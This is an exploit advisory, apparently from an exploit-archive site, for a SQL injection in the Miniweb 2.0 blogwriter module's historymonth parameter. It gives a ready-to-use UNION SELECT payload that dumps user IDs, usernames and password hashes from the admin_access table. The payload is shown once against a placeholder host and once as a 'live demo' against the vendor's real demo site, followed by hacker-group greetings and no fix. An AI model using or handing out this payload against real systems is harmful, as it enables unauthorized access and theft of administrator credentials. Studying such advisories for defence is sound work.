Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability

2008-05-05 00:00:00

############################################
# Rem0te SQL Injection Vulnerability #
# Miniweb 2.0 [ index.php ] #
############################################

[<>]Author: HaCkeR-EgY

[<>]H^0mE: www.pal-hacker.com , atsdp.com

[<>]CONTact: [email protected]
===========================================================
[<>]Script : Miniweb " Blog Writer "
[<>]version : 2.0
[<>]Module Price: Only $39.00
[<>]Portal Price : $ 117
[<>]DOWNL0AD Trial : www.miniweb2.com
============================================================

[<>] D0RK : hmmm........ user YOUR Mind (:

[<>] ExPLO!t :

===>http://example.com/miniweb2/index.php?module=blogwriter&historyyear=2007&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,username,password),4,5,6,7,8,9,10/**/from/**/admin_access/*

[<>] live D!mO :

===> http://miniweb2.com/moduledemo/blogwriter/index.php?historyyear=2008&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,username,password),4,5,6,7,8,9,10/**/from/**/admin_access/*

==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "

[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr
===============================================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.